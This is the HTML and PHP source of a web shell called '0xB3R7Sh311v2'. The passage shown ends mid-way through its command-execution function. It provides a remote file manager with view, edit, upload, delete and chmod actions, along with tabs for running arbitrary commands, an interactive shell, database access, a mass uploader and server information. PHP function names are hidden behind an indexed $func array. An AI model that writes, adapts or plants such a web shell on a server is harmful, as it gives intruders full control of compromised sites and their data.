<link rel="stylesheet" href="https://pro.fontawesome.com/releases/v5.10.0/css/all.css">
<link rel="icon" type="image/png" href="https://avatars.githubusercontent.com/u/117980516?v=4">
<link rel="shortcut icon" type="image/png" href="https://avatars.githubusercontent.com/u/117980516?v=4">
<link rel="apple-touch-icon" href="https://avatars.githubusercontent.com/u/117980516?v=4">
<title>0xB3R7Sh311v2</title>
<style>
/* Base Styles */
body {
background-color: #1a1a1a;
color: #e0e0e0;
font-size: 14px;
overflow-x: hidden;
}
.box {
background-color: #2d2d2d;
border: 1px solid #444;
border-radius: 10px;
padding: 15px;
}
/* Better mobile spacing */
.container-fluid {
padding-left: 10px;
padding-right: 10px;
}
/* Responsive Breadcrumb */
.breadcrumb {
background-color: #333;
padding: 10px 12px;
border-radius: 8px;
font-size: 13px;
overflow-x: auto;
white-space: nowrap;
-webkit-overflow-scrolling: touch;
scrollbar-width: thin;
display: flex;
flex-wrap: nowrap;
}
.breadcrumb::-webkit-scrollbar {
height: 4px;
}
.breadcrumb::-webkit-scrollbar-thumb {
background: #666;
border-radius: 4px;
}
/* Pre tags */
pre {
background-color: #252525;
color: #e0e0e0;
padding: 1rem;
border-radius: 8px;
white-space: pre-wrap;
word-wrap: break-word;
font-size: 13px;
max-height: 400px;
overflow: auto;
}
/* Tabs - Mobile friendly */
.nav-tabs {
display: flex;
flex-wrap: nowrap;
overflow-x: auto;
-webkit-overflow-scrolling: touch;
scrollbar-width: thin;
padding-bottom: 2px;
gap: 2px;
}
.nav-tabs::-webkit-scrollbar {
height: 3px;
}
.nav-tabs .nav-link {
color: #aaa;
padding: 8px 12px;
font-size: 13px;
white-space: nowrap;
border: 1px solid transparent;
border-radius: 6px 6px 0 0;
}
.nav-tabs .nav-link.active {
color: #fff;
background-color: #333;
border-color: #444;
}
.tab-content {
background-color: #333;
border: 1px solid #444;
border-top: none;
padding: 15px;
border-radius: 0 0 8px 8px;
}
/* Form Controls */
.form-control, .form-control:focus {
background-color: #333;
color: #fff;
border-color: #444;
font-size: 14px;
}
.form-control-sm {
font-size: 13px;
padding: 6px 10px;
}
/* Buttons */
.btn-outline-light:hover {
background-color: #444;
}
.btn-sm {
padding: 5px 10px;
font-size: 12px;
}
.btn-group-sm > .btn {
padding: 4px 8px;
font-size: 11px;
}
/* Logout button - positioned better on mobile */
.logout-btn {
position: fixed;
top: 15px;
right: 15px;
z-index: 1000;
box-shadow: 0 2px 5px rgba(0,0,0,0.3);
}
/* Card hover effects - disable on mobile for better performance */
.card {
border: 1px solid #444;
transition: all 0.2s ease;
}
@media (hover: hover) {
.card:hover {
transform: scale(1.02);
z-index: 10;
box-shadow: 0 0 15px rgba(255,255,255,0.1);
}
}
/* Table - make it scrollable horizontally on mobile */
.table-responsive {
border-radius: 8px;
margin-bottom: 1rem;
overflow-x: auto;
-webkit-overflow-scrolling: touch;
}
.table {
min-width: 800px; /* Ensures table doesn't squish on mobile */
margin-bottom: 0;
}
.table-dark {
background-color: #252525;
}
.table-hover tbody tr:hover {
background-color: #3a3a3a;
}
.table th, .table td {
padding: 8px 6px;
vertical-align: middle;
font-size: 13px;
}
/* Badges */
.badge {
font-size: 11px;
padding: 3px 6px;
}
/* Grid view cards - responsive */
.row-cols-2 > * {
padding: 5px;
}
@media (min-width: 576px) {
.row-cols-sm-3 > * { padding: 6px; }
}
@media (min-width: 768px) {
.row-cols-md-4 > * { padding: 8px; }
}
@media (min-width: 992px) {
.row-cols-lg-6 > * { padding: 10px; }
}
/* Card styles for grid view */
.card.bg-dark {
border-radius: 8px;
margin-bottom: 0;
}
.card-body {
padding: 12px 6px;
}
.card-body .fa-3x {
font-size: 2.5rem;
}
/* Info cards */
.card-body.bg-dark {
border-radius: 8px;
}
/* Action buttons group - stack on mobile */
.btn-group {
flex-wrap: wrap;
gap: 2px;
}
.btn-group .btn {
border-radius: 4px !important;
margin: 1px;
}
/* File info table - better mobile view */
.table-sm th, .table-sm td {
padding: 6px 8px;
}
/* Mobile optimizations */
@media (max-width: 768px) {
body {
font-size: 13px;
}
.box {
padding: 10px;
}
h1 {
font-size: 1.8rem;
}
.logout-btn {
top: 10px;
right: 10px;
padding: 4px 8px;
font-size: 11px;
}
.info {
margin-top: 30px; /* Space for fixed logout button */
}
.btn-group .btn {
padding: 4px 8px;
font-size: 11px;
}
.breadcrumb {
font-size: 12px;
padding: 8px 10px;
}
}
/* Very small screens */
@media (max-width: 480px) {
.btn-group .btn {
width: 100%;
margin: 2px 0;
}
.row-cols-2 > * {
flex: 0 0 50%;
max-width: 50%;
}
}
/* Smooth scrolling */
* {
-webkit-overflow-scrolling: touch;
}
/* File icons */
.fa-file-image { color: #5bc0de; }
.fa-file-code { color: #5cb85c; }
.fa-file-alt { color: #aaa; }
.fa-file-archive { color: #f0ad4e; }
.fa-file-audio { color: #5bc0de; }
.fa-file-video { color: #d9534f; }
.fa-file-pdf { color: #d9534f; }
.fa-file-word { color: #5bc0de; }
.fa-file-excel { color: #5cb85c; }
.fa-file-powerpoint { color: #f0ad4e; }
/* Progress bars */
.progress {
background-color: #444;
border-radius: 4px;
}
.progress-bar {
border-radius: 4px;
}
/* Alerts */
.alert-info {
background-color: #1e4b5c;
color: #fff;
border-color: #145c6e;
font-size: 13px;
padding: 8px 12px;
}
.alert-sm {
padding: 6px 10px;
}
/* Search suggestions */
.suggestion-item {
padding: 8px 10px;
border-bottom: 1px solid #444;
cursor: pointer;
font-size: 13px;
transition: background 0.2s;
}
.suggestion-item:hover {
background-color: #444;
}
.suggestion-item:last-child {
border-bottom: none;
}
/* Collapse sections */
.collapse .card-body {
padding: 15px;
}
/* Quick actions */
.w-100.mb-2 {
margin-bottom: 6px !important;
}
/* Text truncation */
.text-truncate {
max-width: 100%;
overflow: hidden;
text-overflow: ellipsis;
}
</style>
</head>
<body class="bg-dark">
<div class="container-fluid py-3 position-relative">
<a href="?logout=1" class="btn btn-outline-danger btn-sm logout-btn" onclick="return confirm('Are you sure you want to logout?')">
<i class="fa fa-sign-out"></i> Logout
</a>
<div class="box shadow p-4 rounded-3">
<div class="info mb-3">
<!-- Profile Circle Inline with Title - MOBILE FRIENDLY -->
<div class="d-flex flex-column flex-sm-row align-items-center justify-content-center mb-2" style="gap: 15px;">
<!-- Profile Circle -->
<a href="https://github.com/B3RT1337" target="_blank" style="text-decoration: none; display: block;">
<div id="profile-circle" style="width: 70px; height: 70px; border-radius: 50%; overflow: hidden; box-shadow: 0 4px 15px rgba(0,0,0,0.5); border: 3px solid #00ff88; cursor: pointer; transition: all 0.3s ease-in-out; margin: 0 auto;"
onmouseover="changeColor(this)"
onmouseout="this.style.borderColor='#00ff88'; this.style.transform='scale(1)'; this.style.boxShadow='0 4px 15px rgba(0,0,0,0.5)';">
<img src="https://avatars.githubusercontent.com/u/117980516?v=4"
alt="GitHub Profile - B3RT1337"
style="width: 100%; height: 100%; object-fit: cover;">
</div>
</a>
<!-- Title - responsive font size -->
<h1 style="color:white; margin: 0; line-height: 1.2; font-size: clamp(1.8rem, 5vw, 2.5rem); text-align: center;">0xB3R7Sh311v2</h1>
</div>
<!-- Server Info (centered below) -->
<div class="text-center mt-3" style="font-size: clamp(12px, 3vw, 14px);">
<div style="display: flex; flex-wrap: wrap; justify-content: center; gap: 10px 15px; margin-bottom: 5px;">
<span><i class="fa fa-user"></i> <?= isset($_SERVER['HTTP_X_FORWARDED_FOR']) ? htmlspecialchars($_SERVER['HTTP_X_FORWARDED_FOR']) : (isset($_SERVER['REMOTE_ADDR']) ? htmlspecialchars($_SERVER['REMOTE_ADDR']) : 'Unknown') ?></span>
<span><i class="fa fa-server"></i> <?= $func[0]() ?></span>
</div>
<div style="display: flex; flex-wrap: wrap; justify-content: center; gap: 10px 15px;">
<span><i class="fa fa-microchip"></i> <?= $_SERVER['SERVER_SOFTWARE'] ?></span>
<span><i class="fa fa-satellite-dish"></i> <?= !@$_SERVER['SERVER_ADDR'] ? $func[19]($_SERVER['SERVER_NAME']) : @$_SERVER['SERVER_ADDR'] ?></span>
</div>
</div>
<!-- JavaScript for random color on hover -->
<script>
function changeColor(element) {
const colors = [
'#00ff88', '#ff00ff', '#00ffff', '#ffff00',
'#ff6600', '#ff0000', '#9900ff', '#0099ff',
'#ff0099', '#00ff99', '#ffcc00', '#ff3366'
];
const randomColor = colors[Math.floor(Math.random() * colors.length)];
element.style.borderColor = randomColor;
element.style.transform = 'scale(1.05)';
element.style.boxShadow = '0 6px 20px rgba(0,0,0,0.7)';
}
</script>
</div>
<ul class="nav nav-tabs mb-3" id="shellTabs" role="tablist">
<li class="nav-item" role="presentation">
<button class="nav-link active" id="file-tab" data-bs-toggle="tab" data-bs-target="#file" type="button" role="tab">File Manager</button>
</li>
<li class="nav-item" role="presentation">
<button class="nav-link" id="command-tab" data-bs-toggle="tab" data-bs-target="#command" type="button" role="tab">Command</button>
</li>
<li class="nav-item" role="presentation">
<button class="nav-link" id="database-tab" data-bs-toggle="tab" data-bs-target="#database" type="button" role="tab">Database</button>
</li>
<li class="nav-item" role="presentation">
<button class="nav-link" id="shell-tab" data-bs-toggle="tab" data-bs-target="#shell" type="button" role="tab">Shell</button>
</li>
<li class="nav-item" role="presentation">
<button class="nav-link" id="download-tab" data-bs-toggle="tab" data-bs-target="#download" type="button" role="tab">Download/Upload</button>
</li>
<li class="nav-item" role="presentation">
<button class="nav-link" id="massupload-tab" data-bs-toggle="tab" data-bs-target="#massupload" type="button" role="tab">Mass Uploader</button>
</li>
<li class="nav-item" role="presentation">
<button class="nav-link" id="info-tab" data-bs-toggle="tab" data-bs-target="#info" type="button" role="tab">System Info</button>
</li>
</ul>
<div class="tab-content" id="shellTabsContent">
<!-- File Manager Tab -->
<div class="tab-pane fade show active" id="file" role="tabpanel">
<!-- Breadcrumb Navigation -->
<div class="breadcrumb mb-3 d-flex align-items-center">
<i class="fa fa-folder-open me-2"></i>
<?php foreach ($exdir as $id => $pat) :
if ($pat == '' && $id == 0):
?>
<a href="?dir=/" class="text-decoration-none text-light">🌐 Root</a>
<?php endif; if ($pat == '') continue; ?>
<?php if ($id + 1 == count($exdir)) : ?>
<span class="text-secondary mx-1">/ <?= htmlspecialchars($pat) ?></span>
<?php else : ?>
<a href="?dir=<?php
for ($i = 0; $i <= $id; $i++) {
echo urlencode($exdir[$i]);
if ($i != $id) echo "/";
}
?>" class="text-decoration-none text-light mx-1"><?= htmlspecialchars($pat) ?></a>
<span class="text-light">/</span>
<?php endif; ?>
<?php endforeach; ?>
<a href="?" class="text-decoration-none text-light ms-2">🏠 Home</a>
</div>
<!-- Action Buttons -->
<div class="row mb-3">
<div class="col-md-8">
<div class="btn-group flex-wrap" role="group">
<button class="btn btn-outline-light btn-sm" data-bs-toggle="collapse" href="#newFolderCollapse">
<i class="fa fa-folder-plus"></i> New Folder
</button>
<button class="btn btn-outline-light btn-sm" data-bs-toggle="collapse" href="#newFileCollapse">
<i class="fa fa-file-plus"></i> New File
</button>
<button class="btn btn-outline-light btn-sm" data-bs-toggle="collapse" href="#uploadCollapse">
<i class="fa fa-upload"></i> Upload
</button>
<button class="btn btn-outline-light btn-sm" data-bs-toggle="collapse" href="#searchCollapse">
<i class="fa fa-search"></i> Search
</button>
</div>
</div>
<div class="col-md-4">
<div class="text-end text-muted small">
<i class="fa fa-folder"></i> Folders: <?php
$folder_count = 0;
$file_count = 0;
foreach ($dirs as $item) {
if ($item != '.' && $item != '..') {
if (is_dir($path . '/' . $item)) {
$folder_count++;
} else {
$file_count++;
}
}
}
echo $folder_count;
?> |
<i class="fa fa-file"></i> Files: <?= $file_count ?>
</div>
</div>
</div>
<!-- Collapsible Sections -->
<div class="collapse mb-3" id="newFolderCollapse">
<div class="card card-body bg-dark">
<form action="" method="post">
<div class="mb-3">
<label class="form-label">Folder Name</label>
<input type="text" class="form-control form-control-sm" name="newFolderName" placeholder="NewFolder" required>
</div>
<button type="submit" class="btn btn-outline-light btn-sm">Create Folder</button>
</form>
</div>
</div>
<div class="collapse mb-3" id="newFileCollapse">
<div class="card card-body bg-dark">
<form action="" method="post">
<div class="mb-3">
<label class="form-label">File Name</label>
<input type="text" class="form-control form-control-sm" name="newFileName" placeholder="0xB3R7Sh311v2.php" required>
</div>
<div class="mb-3">
<label class="form-label">Content</label>
<textarea name="newFileContent" rows="8" class="form-control form-control-sm" placeholder="File content..."></textarea>
</div>
<button type="submit" class="btn btn-outline-light btn-sm">Create File</button>
</form>
</div>
</div>
<div class="collapse mb-3" id="uploadCollapse">
<div class="card card-body bg-dark">
<form action="" method="post" enctype="multipart/form-data">
<div class="mb-3">
<label class="form-label">Select Files (Multiple allowed)</label>
<input type="file" class="form-control form-control-sm" name="uploadfile[]" multiple required>
</div>
<button type="submit" class="btn btn-outline-light btn-sm">Upload Files</button>
</form>
</div>
</div>
<div class="collapse mb-3" id="searchCollapse">
<div class="card card-body bg-dark">
<form action="" method="get" id="searchForm">
<?php
// Store the raw path for the form
$form_path = isset($_GET['dir']) ? $_GET['dir'] : $path;
// If it's already encoded, keep it as is
if (strpos($form_path, '%2F') !== false) {
$form_path = $form_path; // Keep as is
} else {
$form_path = urlencode($path);
}
?>
<input type="hidden" name="dir" value="<?= htmlspecialchars($form_path) ?>">
<div class="input-group input-group-sm">
<input type="text" class="form-control form-control-sm" id="searchInput" name="search" placeholder="Search files/folders..." value="<?= isset($_GET['search']) ? htmlspecialchars(urldecode($_GET['search'])) : '' ?>" autocomplete="off">
<button type="submit" class="btn btn-outline-light"><i class="fa fa-search"></i></button>
<?php if (isset($_GET['search']) && !empty($_GET['search'])): ?>
<a href="?dir=<?= urlencode($path) ?>" class="btn btn-outline-light">Clear</a>
<?php endif; ?>
</div>
<div class="mt-2 small text-muted">
<i class="fa fa-info-circle"></i> Searching in: <?= htmlspecialchars(urldecode($path)) ?>
</div>
<!-- Live search suggestions -->
<div id="searchSuggestions" class="mt-2" style="display: none;">
<div class="card bg-dark border-secondary">
<div class="card-body p-2">
<small class="text-muted">Suggestions:</small>
<div id="suggestionsList" class="mt-1"></div>
</div>
</div>
</div>
</form>
</div>
</div>
<!-- Search Results Info -->
<?php if (isset($_GET['search']) && !empty($_GET['search'])): ?>
<?php
$search_term_raw = $_GET['search'];
$search_term = strtolower(urldecode($search_term_raw));
// Count all items that match the search (excluding . and ..)
$matching_items = array();
$all_files_list = array();
foreach ($dirs as $item) {
if ($item != '.' && $item != '..') {
$all_files_list[] = $item;
$item_lower = strtolower($item);
// Check if search term is contained in the filename
if (strpos($item_lower, $search_term) !== false) {
$matching_items[] = $item;
}
}
}
$filtered_count = count($matching_items);
// Store matching items for JavaScript suggestions
$suggestions_json = json_encode($all_files_list);
?>
<div class="alert alert-info alert-sm py-1 mb-2">
<i class="fa fa-search"></i>
Search results for "<strong><?= htmlspecialchars(urldecode($search_term_raw)) ?></strong>" -
<?= $filtered_count ?> item(s) found
<?php if ($filtered_count > 0): ?>
<button class="btn btn-xs btn-outline-light float-end" onclick="document.getElementById('searchInput').value = ''; window.location.href='?dir=<?= urlencode($path) ?>'">Clear Search</button>
<?php endif; ?>
</div>
<?php endif; ?>
<!-- Live Search Suggestions Script -->
<script>
// Live search suggestions
document.addEventListener('DOMContentLoaded', function() {
const searchInput = document.getElementById('searchInput');
const suggestionsDiv = document.getElementById('searchSuggestions');
const suggestionsList = document.getElementById('suggestionsList');
if (searchInput) {
// Get all files from the directory
const allFiles = <?= json_encode(array_values(array_filter($dirs, function($item) {
return $item != '.' && $item != '..';
}))) ?>;
searchInput.addEventListener('input', function() {
const query = this.value.toLowerCase().trim();
if (query.length < 1) {
suggestionsDiv.style.display = 'none';
return;
}
// Filter files that match the query
const matches = allFiles.filter(file =>
file.toLowerCase().includes(query)
).slice(0, 10);
if (matches.length > 0) {
suggestionsList.innerHTML = matches.map(file =>
`<div class="suggestion-item p-1" style="cursor: pointer; border-bottom: 1px solid #444;" onclick="window.location.href='?dir=<?= urlencode($path) ?>&search=${encodeURIComponent(file)}'">
<i class="fa fa-file text-muted me-2"></i>${file}
</div>`
).join('');
suggestionsDiv.style.display = 'block';
} else {
suggestionsDiv.style.display = 'none';
}
});
// Hide suggestions when clicking outside
document.addEventListener('click', function(e) {
if (!searchInput.contains(e.target) && !suggestionsDiv.contains(e.target)) {
suggestionsDiv.style.display = 'none';
}
});
}
});
</script>
<style>
.suggestion-item:hover {
background-color: #444;
border-radius: 3px;
}
.suggestion-item:last-child {
border-bottom: none !important;
}
</style>
<!-- Action Forms (Rename, Edit, Chmod) -->
<?php if (isset($_GET['action'])) : ?>
<div class="card card-body bg-dark mb-3">
<?php if ($_GET['action'] == 'rename' && isset($_GET['item'])) : ?>
<form action="" method="post">
<div class="mb-3">
<label class="form-label">Rename: <?= htmlspecialchars($_GET['item']) ?></label>
<input type="text" class="form-control form-control-sm" name="newName" value="<?= htmlspecialchars($_GET['item']) ?>" required>
</div>
<button type="submit" class="btn btn-outline-light btn-sm">Rename</button>
<a href="?dir=<?= urlencode($path) ?><?= isset($_GET['search']) ? '&search=' . urlencode($_GET['search']) : '' ?>" class="btn btn-outline-light btn-sm">Cancel</a>
</form>
<?php elseif ($_GET['action'] == 'edit' && isset($_GET['item'])) : ?>
<?php
$file_content = $func[5]($path. '/'. $_GET['item']);
?>
<form action="" method="post">
<div class="mb-3">
<label class="form-label">Editing: <?= htmlspecialchars($_GET['item']) ?></label>
<textarea id="CopyFromTextArea" name="newContent" rows="15" class="form-control form-control-sm font-monospace"><?= htmlspecialchars($file_content) ?></textarea>
</div>
<button type="submit" class="btn btn-outline-light btn-sm">Save</button>
<button type="button" class="btn btn-outline-light btn-sm" onclick="jscopy()">Copy</button>
<a href="?dir=<?= urlencode($path) ?><?= isset($_GET['search']) ? '&search=' . urlencode($_GET['search']) : '' ?>" class="btn btn-outline-light btn-sm">Cancel</a>
</form>
<?php elseif ($_GET['action'] == 'view' && isset($_GET['item'])) : ?>
<?php
$file_content = $func[5]($path. '/'. $_GET['item']);
$file_ext = pathinfo($_GET['item'], PATHINFO_EXTENSION);
$is_image = in_array(strtolower($file_ext), ['jpg', 'jpeg', 'png', 'gif', 'bmp', 'webp']);
$is_text = in_array(strtolower($file_ext), ['txt', 'php', 'html', 'htm', 'css', 'js', 'json', 'xml', 'ini', 'conf', 'log', 'md', 'py', 'sh']);
?>
<div class="mb-3">
<div class="d-flex justify-content-between mb-2">
<label class="form-label">Viewing: <?= htmlspecialchars($_GET['item']) ?> (<?= fsize($path . '/' . $_GET['item']) ?>)</label>
<div>
<a href="?dir=<?= urlencode($path) ?>&item=<?= urlencode($_GET['item']) ?>&action=edit<?= isset($_GET['search']) ? '&search=' . urlencode($_GET['search']) : '' ?>" class="btn btn-outline-light btn-sm">Edit</a>
<a href="?dir=<?= urlencode($path) ?>&download=1&item=<?= urlencode($_GET['item']) ?>" class="btn btn-outline-light btn-sm">Download</a>
<a href="?dir=<?= urlencode($path) ?><?= isset($_GET['search']) ? '&search=' . urlencode($_GET['search']) : '' ?>" class="btn btn-outline-light btn-sm">Back</a>
</div>
</div>
<?php if ($is_image): ?>
<div class="text-center">
<img src="data:image/<?= $file_ext ?>;base64,<?= base64_encode($file_content) ?>" class="img-fluid" style="max-height: 500px;" alt="<?= htmlspecialchars($_GET['item']) ?>">
</div>
<?php elseif ($is_text): ?>
<pre class="bg-dark text-light p-3 rounded" style="max-height: 500px; overflow: auto;"><code><?= htmlspecialchars($file_content) ?></code></pre>
<?php else: ?>
<textarea readonly rows="15" class="form-control form-control-sm font-monospace"><?= htmlspecialchars($file_content) ?></textarea>
<?php endif; ?>
</div>
<?php elseif ($_GET['action'] == 'chmod' && isset($_GET['item'])) : ?>
<form action="" method="post">
<div class="mb-3">
<label class="form-label">Change Permissions: <?= htmlspecialchars($_GET['item']) ?></label>
<div class="input-group input-group-sm">
<input type="text" class="form-control form-control-sm" name="newPerm" value="<?= $func[11]($func[10]('%o', $func[6]($_GET['item'])), -4); ?>" required>
<span class="input-group-text bg-dark text-light">Current: <?= $func[11]($func[10]('%o', $func[6]($_GET['item'])), -4); ?></span>
</div>
<small class="text-muted">Enter 3-digit octal (e.g., 755, 644, 777)</small>
</div>
<button type="submit" class="btn btn-outline-light btn-sm">Change</button>
<a href="?dir=<?= urlencode($path) ?><?= isset($_GET['search']) ? '&search=' . urlencode($_GET['search']) : '' ?>" class="btn btn-outline-light btn-sm">Cancel</a>
</form>
<?php elseif ($_GET['action'] == 'info' && isset($_GET['item'])) : ?>
<?php
$item_path = $path . '/' . $_GET['item'];
$is_dir = is_dir($item_path);
$stat = stat($item_path);
?>
<div class="mb-3">
<label class="form-label">File Info: <?= htmlspecialchars($_GET['item']) ?></label>
<table class="table table-dark table-sm table-bordered">
<tr><th width="30%">Full Path</th><td><?= htmlspecialchars($item_path) ?></td></tr>
<tr><th>Type</th><td><?= $is_dir ? 'Directory' : 'File' ?></td></tr>
<tr><th>Size</th><td><?= $is_dir ? '-' : fsize($item_path) ?></td></tr>
<tr><th>Permissions</th><td><?= $func[11]($func[10]('%o', $func[6]($_GET['item'])), -4); ?></td></tr>
<tr><th>Owner/Group</th><td><?= htmlspecialchars($func[35]($item_path)) ?></td></tr>
<tr><th>Created</th><td><?= date('Y-m-d H:i:s', $stat['ctime']) ?></td></tr>
<tr><th>Modified</th><td><?= date('Y-m-d H:i:s', $stat['mtime']) ?></td></tr>
<tr><th>Accessed</th><td><?= date('Y-m-d H:i:s', $stat['atime']) ?></td></tr>
<tr><th>Inode</th><td><?= $stat['ino'] ?></td></tr>
<tr><th>Device</th><td><?= $stat['dev'] ?></td></tr>
</table>
<a href="?dir=<?= urlencode($path) ?><?= isset($_GET['search']) ? '&search=' . urlencode($_GET['search']) : '' ?>" class="btn btn-outline-light btn-sm">Back</a>
</div>
<?php endif; ?>
</div>
<?php endif; ?>
<!-- File Manager Table View -->
<?php
// Get all items excluding . and ..
$all_items = array();
foreach ($dirs as $item) {
if ($item != '.' && $item != '..') {
$all_items[] = $item;
}
}
// Filter by search if set
$display_items = $all_items;
if (isset($_GET['search']) && !empty($_GET['search'])) {
$search_term = strtolower(urldecode($_GET['search']));
$display_items = array();
foreach ($all_items as $item) {
if (strpos(strtolower($item), $search_term) !== false) {
$display_items[] = $item;
}
}
}
// Separate folders and files for display
$display_folders = array();
$display_files = array();
foreach ($display_items as $item) {
$full_path = $path . '/' . $item;
if (is_dir($full_path)) {
$display_folders[] = $item;
} else {
$display_files[] = $item;
}
}
// Sort alphabetically
sort($display_folders);
sort($display_files);
?>
<!-- Table View -->
<div class="table-responsive">
<table class="table table-hover table-dark table-sm">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th>Size</th>
<th>Owner/Group</th>
<th>Permissions</th>
<th>Modified</th>
<th>Actions</th>
</tr>
</thead>
<tbody>
<!-- Parent directory link (only show if not searching) -->
<?php if (!isset($_GET['search']) && is_dir($path . '/..') && $path != '/'): ?>
<tr>
<td>
<a href="?dir=<?= urlencode(dirname($path)) ?>" class="text-decoration-none text-light">
<i class="fa fa-level-up-alt"></i> <strong>.. (Parent)</strong>
</a>
</br>
<td>directory</br>
<td>-</br>
<td>-</br>
<td>-</br>
<td>-</br>
<td>
<a href="?dir=<?= urlencode(dirname($path)) ?>" class="btn btn-outline-light btn-sm">Go</a>
</br>
</tr>
<?php endif; ?>
<!-- Folders -->
<?php foreach ($display_folders as $dir): ?>
<tr>
<td>
<a href="?dir=<?= urlencode($path . '/' . $dir) ?><?= isset($_GET['search']) ? '&search=' . urlencode($_GET['search']) : '' ?>" class="text-decoration-none text-light">
<i class="fa fa-folder text-warning"></i> <?= htmlspecialchars($dir) ?>
</a>
</br>
<td>📁 Directory</br>
<td>-</br>
<td><?= htmlspecialchars($func[35]($path . '/' . $dir)) ?></br>
<td>
<span class="badge bg-secondary"><?= $func[11]($func[10]('%o', $func[6]($path . '/' . $dir)), -4); ?></span>
</br>
<td><?= $func[23]("Y-m-d H:i", $func[7]($path . '/' . $dir)); ?></br>
<td>
<div class="btn-group btn-group-sm">
<a href="?dir=<?= urlencode($path) ?>&item=<?= urlencode($dir) ?>&action=rename<?= isset($_GET['search']) ? '&search=' . urlencode($_GET['search']) : '' ?>" class="btn btn-outline-light" title="Rename">
<i class="fa fa-edit"></i>
</a>
<a href="?dir=<?= urlencode($path) ?>&item=<?= urlencode($dir) ?>&action=chmod<?= isset($_GET['search']) ? '&search=' . urlencode($_GET['search']) : '' ?>" class="btn btn-outline-light" title="Permissions">
<i class="fa fa-key"></i>
</a>
<a href="?dir=<?= urlencode($path) ?>&item=<?= urlencode($dir) ?>&action=info<?= isset($_GET['search']) ? '&search=' . urlencode($_GET['search']) : '' ?>" class="btn btn-outline-light" title="Info">
<i class="fa fa-info-circle"></i>
</a>
<a href="?dir=<?= urlencode($path) ?>&item=<?= urlencode($path . '/' . $dir) ?>&action=delete<?= isset($_GET['search']) ? '&search=' . urlencode($_GET['search']) : '' ?>" class="btn btn-outline-light" onclick="return confirm('Delete folder \'<?= htmlspecialchars($dir) ?>\' and all contents?')" title="Delete">
<i class="fa fa-trash"></i>
</a>
</div>
</br>
</tr>
<?php endforeach; ?>
<!-- Files -->
<?php foreach ($display_files as $file):
$ext = strtolower(pathinfo($file, PATHINFO_EXTENSION));
$icon = 'fa-file';
if (in_array($ext, ['jpg', 'jpeg', 'png', 'gif', 'bmp', 'webp'])) $icon = 'fa-file-image text-info';
else if (in_array($ext, ['php', 'html', 'htm', 'js', 'css', 'py', 'sh', 'pl', 'rb'])) $icon = 'fa-file-code text-success';
else if (in_array($ext, ['txt', 'md', 'log', 'ini', 'conf', 'xml', 'json'])) $icon = 'fa-file-alt text-secondary';
else if (in_array($ext, ['zip', 'tar', 'gz', 'rar', '7z'])) $icon = 'fa-file-archive text-warning';
else if (in_array($ext, ['mp3', 'wav', 'ogg', 'flac'])) $icon = 'fa-file-audio text-primary';
else if (in_array($ext, ['mp4', 'avi', 'mov', 'mkv'])) $icon = 'fa-file-video text-danger';
else if (in_array($ext, ['pdf'])) $icon = 'fa-file-pdf text-danger';
else if (in_array($ext, ['doc', 'docx'])) $icon = 'fa-file-word text-primary';
else if (in_array($ext, ['xls', 'xlsx'])) $icon = 'fa-file-excel text-success';
else if (in_array($ext, ['ppt', 'pptx'])) $icon = 'fa-file-powerpoint text-warning';
?>
<tr>
<td>
<a href="?dir=<?= urlencode($path) ?>&item=<?= urlencode($file) ?>&action=view<?= isset($_GET['search']) ? '&search=' . urlencode($_GET['search']) : '' ?>" class="text-decoration-none text-light">
<i class="fa <?= $icon ?>"></i> <?= htmlspecialchars($file) ?>
</a>
</br>
<td><?= ($func[25]('mime_content_type') ? htmlspecialchars($func[24]($path . '/' . $file)) : htmlspecialchars($func[8]($path . '/' . $file))) ?></br>
<td><?= $func[26]($path . '/' . $file) ?></br>
<td><?= htmlspecialchars($func[35]($path . '/' . $file)) ?></br>
<td>
<span class="badge bg-secondary"><?= $func[11]($func[10]('%o', $func[6]($path . '/' . $file)), -4); ?></span>
</br>
<td><?= $func[23]("Y-m-d H:i", $func[7]($path . '/' . $file)); ?></br>
<td>
<div class="btn-group btn-group-sm">
<a href="?dir=<?= urlencode($path) ?>&item=<?= urlencode($file) ?>&action=edit<?= isset($_GET['search']) ? '&search=' . urlencode($_GET['search']) : '' ?>" class="btn btn-outline-light" title="Edit">
<i class="fa fa-edit"></i>
</a>
<a href="?dir=<?= urlencode($path) ?>&item=<?= urlencode($file) ?>&action=rename<?= isset($_GET['search']) ? '&search=' . urlencode($_GET['search']) : '' ?>" class="btn btn-outline-light" title="Rename">
<i class="fa fa-i-cursor"></i>
</a>
<a href="?dir=<?= urlencode($path) ?>&item=<?= urlencode($file) ?>&action=chmod<?= isset($_GET['search']) ? '&search=' . urlencode($_GET['search']) : '' ?>" class="btn btn-outline-light" title="Permissions">
<i class="fa fa-key"></i>
</a>
<a href="?dir=<?= urlencode($path) ?>&item=<?= urlencode($file) ?>&action=info<?= isset($_GET['search']) ? '&search=' . urlencode($_GET['search']) : '' ?>" class="btn btn-outline-light" title="Info">
<i class="fa fa-info-circle"></i>
</a>
<a href="?dir=<?= urlencode($path) ?>&download=1&item=<?= urlencode($file) ?>" class="btn btn-outline-light" title="Download">
<i class="fa fa-download"></i>
</a>
<a href="?dir=<?= urlencode($path) ?>&item=<?= urlencode($path . '/' . $file) ?>&action=delete<?= isset($_GET['search']) ? '&search=' . urlencode($_GET['search']) : '' ?>" class="btn btn-outline-light" onclick="return confirm('Delete file \'<?= htmlspecialchars($file) ?>\'?')" title="Delete">
<i class="fa fa-trash"></i>
</a>
</div>
</br>
</tr>
<?php endforeach; ?>
<?php if (empty($display_folders) && empty($display_files)): ?>
<tr>
<td colspan="7" class="text-center text-muted">📂 No items found</br>
</tr>
<?php endif; ?>
</tbody>
</table>
</div>
<!-- Refresh Button -->
<div class="row mt-3">
<div class="col-md-12">
<div class="d-flex justify-content-center">
<a href="?dir=<?= urlencode($path) ?>" class="btn btn-outline-light btn-sm">
<i class="fa fa-refresh"></i> Refresh
</a>
</div>
</div>
</div>
</div>
<!-- Command Tab -->
<div class="tab-pane fade" id="command" role="tabpanel">
<form action="" method="post" class="mb-3" id="commandForm">
<input type="hidden" name="active_tab" value="command">
<div class="mb-3">
<label class="form-label">Command</label>
<input type="text" class="form-control form-control-sm" name="command" placeholder="Enter command" value="<?= isset($_POST['command']) ? htmlspecialchars($_POST['command']) : '' ?>">
</div>
<button type="submit" class="btn btn-outline-light btn-sm">Execute</button>
</form>
<?php if (isset($_POST['command']) && (!isset($_POST['active_tab']) || $_POST['active_tab'] === 'command')) : ?>
<div class="card card-body bg-dark">
<?php
function execute_command($cmd) {
$output = '';
$success = false;
// Method 1: proc_open (most reliable)
if (function_exists('proc_open')) {
$descriptorspec = array(
